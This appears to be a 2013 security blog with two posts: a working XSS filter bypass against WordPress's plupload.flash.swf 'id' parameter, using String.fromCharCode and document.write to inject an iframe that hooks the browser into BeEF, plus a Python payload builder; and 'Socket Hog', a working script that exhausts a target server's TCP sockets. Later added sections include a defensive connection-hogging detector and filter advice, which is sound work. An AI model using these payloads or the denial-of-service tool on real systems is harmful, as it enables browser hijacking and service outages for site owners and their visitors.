Friday, April 12, 2013

XSS WAF Bypass Using CharCode() Encoding

Recently I found a potential XSS injection point while testing a client's web app. Unfortunately, most of the common XSS techniques did not work on this particular target: the Flash component of the Plupload upload library that ships with WordPress ('plupload.flash.swf' under wp-includes).

Found the XSS injection point here:

http://webhost/wp-includes/js/plupload/plupload.flash.swf?id=

And got an initial alert box:

http://webhost/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28c%29{alert%281%29;}//
(This displays an alert box with the value 1. The value closes the string and the call that the SWF builds around the id parameter, swallows the resulting error in a catch block, and comments out whatever follows with //. At this point no quoted alphabetic string [a-zA-Z] could be passed to alert(), for reasons that were not obvious at the time.)

I spent the earlier part of the morning trying to get it to do more, or to get <script> tags through, but then I realized where the JavaScript is being injected: the value lands inside a script the SWF generates, not in the HTML body, so HTML tags are never parsed there and only plain JavaScript will run.

I bypassed that limitation with String.fromCharCode() encoding and got the standard alert box with [a-zA-Z] displaying. But I still wanted to take it a step further and get the browser hooked into BeEF.

http:///wp-includes/js/plupload/plupload.flash.swf?id=\%22));}catch(e){alert(String.fromCharCode(120,66,49,78,52,82,89,120));}//

So I thought of using document.write() and encoding the HTML tags inside it, basically writing a whole new page into the browser. This proof of concept writes a NEW page to the browser that contains <script>alert("XSS")</script>. Because the tags arrive as character codes, the WAF never sees a literal <script>, and the injection context no longer matters: document.write() hands the decoded markup straight to the HTML parser.

It’s like XSS within XSS!

Now with that POC, I encoded a new page with an iframe pointing at my BeEF instance (the character codes below decode to <html><body><iframe src="http://127.0.0.1:3000/demos/basic.html"></iframe></body></html>, BeEF's demo page). Look at this string LOL.

http:///wp-includes/js/plupload/plupload.flash.swf?id=\"));}catch(e){document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,58,51,48,48,48,47,100,101,109,111,115,47,98,97,115,105,99,46,104,116,109,108,34,62,60,47,105,102,114,97,109,101,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62));}//

And bingo! The browser is now hooked. We've defeated the WAF and turned a constrained injection point into a dangerous XSS string!

Props to Uncle Jim's charcode decoder/encoder:
http://jdstiles.com/java/cct.html
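The encode/decode step above in code, as an added example that is not part of the original post. It builds the String.fromCharCode() form of any HTML, wraps it in the same break-out shape the post uses, and decodes the post's own final payload back to the iframe it carries. The filter regex is a constructed stand-in for a naive WAF rule (the real rules are not on the page): it rejects angle brackets and quoted letters, which is enough to show why the plain alert("XSS") is blocked while the encoded form passes.

```python
# Added example (Python 3), not code from the original post: build and decode
# String.fromCharCode() payloads and show why a naive character filter passes
# the encoded form while blocking the plain one.
import re


def to_charcode_expr(text):
    """Encode text as a JavaScript String.fromCharCode(...) expression."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in text) + ")"


def decode_charcode_list(code_list):
    """Turn a list like '60,104,116' back into the text the browser will evaluate."""
    return "".join(chr(int(n)) for n in code_list.split(","))


def decode_charcode_expr(expr):
    """Find the first String.fromCharCode(...) call in expr and decode its argument."""
    m = re.search(r"String\.fromCharCode\(([\d,\s]+)\)", expr)
    if m is None:
        raise ValueError("no String.fromCharCode(...) call found")
    return decode_charcode_list(m.group(1))


def build_payload(html):
    """Injection value for the id= parameter, in the shape the post uses:
    close the string and call wrapped around the value, open a catch block,
    document.write() the encoded HTML, and comment out the remainder."""
    return '\\"));}catch(e){document.write(' + to_charcode_expr(html) + ');}//'


# Constructed stand-in for a naive WAF rule (assumption, not the real rule set):
# reject angle brackets and any quote followed by a letter.
NAIVE_FILTER = re.compile(r"""<|>|["'][A-Za-z]""")


def naive_filter_allows(value):
    """True when the constructed filter would let the parameter value through."""
    return NAIVE_FILTER.search(value) is None


# The numeric list from the post's final payload, copied verbatim.
POST_CODE_LIST = (
    "60,104,116,109,108,62,60,98,111,100,121,62,60,105,102,114,97,109,101,32,"
    "115,114,99,61,34,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,58,"
    "51,48,48,48,47,100,101,109,111,115,47,98,97,115,105,99,46,104,116,109,108,"
    "34,62,60,47,105,102,114,97,109,101,62,60,47,98,111,100,121,62,60,47,104,"
    "116,109,108,62"
)

# What that list decodes to: an iframe pointing at the BeEF demo page.
BEEF_HOOK_PAGE = (
    '<html><body><iframe src="http://127.0.0.1:3000/demos/basic.html">'
    "</iframe></body></html>"
)

if __name__ == "__main__":
    print(decode_charcode_list(POST_CODE_LIST))
    plain = '\\"));}catch(e){alert("XSS");}//'
    encoded = build_payload('<script>alert("XSS")</script>')
    print("plain payload allowed:  ", naive_filter_allows(plain))
    print("encoded payload allowed:", naive_filter_allows(encoded))
    print(encoded)
```

The point of the decoder is review, not attack: when a WAF log or a proxy capture shows a long String.fromCharCode() list, decode it before deciding whether the request was benign. A filter that only matches literal tags or quoted words will never trigger on the encoded form; matching on the fromCharCode call itself, or decoding parameters before inspection, is what actually catches this.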

Friday, April 5, 2013

Socket Hog v1.0

This simple tool attempts to open (and keep open) TCP connections to a given port, ultimately exhausting the server's available sockets for a given amount of time.
###################################
#                                 # 
# Socket Hog v1.0 - Charles Riggs #
#                                 #
###################################

#!/usr/bin/env python3

import socket
import sys
import time

# Python 3: input() returns text (in Python 2, input() evaluated it), so the
# numeric answers are converted explicitly.
host = input("Host IP to attack: ")
port = int(input("Port to attack: "))
conn = int(input("How many connections do you want to make: "))
opentime = float(input("How many seconds to keep the connections open: "))

allsockets = []
for _ in range(conn):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10.0)
    try:
        s.connect((host, port))
    except OSError as e:
        # Refused or timed out: the target's backlog or socket table is
        # probably full already, so keep what we have rather than crash.
        print("connect failed after %d sockets: %s" % (len(allsockets), e),
              file=sys.stderr)
        s.close()
        break
    allsockets.append(s)

print("holding %d connections open for %s seconds" % (len(allsockets), opentime))
time.sleep(opentime)

# Release the sockets so the target recovers when the hold time is over.
for s in allsockets:
    s.close()
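The defender's side of this, as an added example that is not part of the original post: a check that spots a Socket Hog style client from the server's connection table. It parses "ss -tn"-style lines and flags peers holding an unusual number of established connections to one local port. The snapshot below is constructed for the example, not captured output, and the threshold is an assumption to tune per service.

```python
# Added example (Python 3), not part of the original post: flag peers that
# hold many established connections to one local port, from ss -tn style
# output. SAMPLE_SS_OUTPUT is constructed, not a real capture.
from collections import Counter

# Constructed snapshot: one peer holds four idle connections to :80.
SAMPLE_SS_OUTPUT = """\
State    Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
ESTAB    0       0       10.0.0.5:80          203.0.113.7:51234
ESTAB    0       0       10.0.0.5:80          203.0.113.7:51235
ESTAB    0       0       10.0.0.5:80          203.0.113.7:51236
ESTAB    0       0       10.0.0.5:80          203.0.113.7:51237
SYN-RECV 0       0       10.0.0.5:80          203.0.113.7:51238
ESTAB    0       0       10.0.0.5:80          198.51.100.9:40001
ESTAB    0       0       10.0.0.5:22          203.0.113.7:60000
ESTAB    0       0       [::1]:80             [::1]:41000
"""


def split_addr(addr):
    """Split 'ip:port' or '[v6]:port' into (ip, port)."""
    ip, port = addr.rsplit(":", 1)
    return ip.strip("[]"), int(port)


def parse_ss_line(line):
    """Return (state, local_port, peer_ip) for a data line, None for header/blank."""
    parts = line.split()
    if len(parts) < 5 or parts[0] == "State":
        return None
    _, local_port = split_addr(parts[3])
    peer_ip, _ = split_addr(parts[4])
    return parts[0], local_port, peer_ip


def connections_per_peer(snapshot, local_port=None, state="ESTAB"):
    """Count connections in `state` per peer IP, optionally only to local_port."""
    counts = Counter()
    for line in snapshot.splitlines():
        rec = parse_ss_line(line)
        if rec is None:
            continue
        st, lport, peer_ip = rec
        if st != state or (local_port is not None and lport != local_port):
            continue
        counts[peer_ip] += 1
    return counts


def hogging_peers(snapshot, threshold, local_port=None):
    """(peer_ip, count) pairs at or above threshold, most connections first."""
    counts = connections_per_peer(snapshot, local_port)
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]


if __name__ == "__main__":
    # Threshold of 3 is an assumption for the demo; tune it per service.
    for ip, n in hogging_peers(SAMPLE_SS_OUTPUT, threshold=3, local_port=80):
        print("%s holds %d established connections to :80" % (ip, n))
```

On a live box feed it the real table (`ss -tn` on Linux) and look at Recv-Q and connection age as well: a hog's sockets sit idle with nothing queued, which separates them from a busy but legitimate client. The fix is on the server side, not the detector: per-source connection caps and short idle timeouts in the listener or the front proxy cut the hold time that makes the tool work.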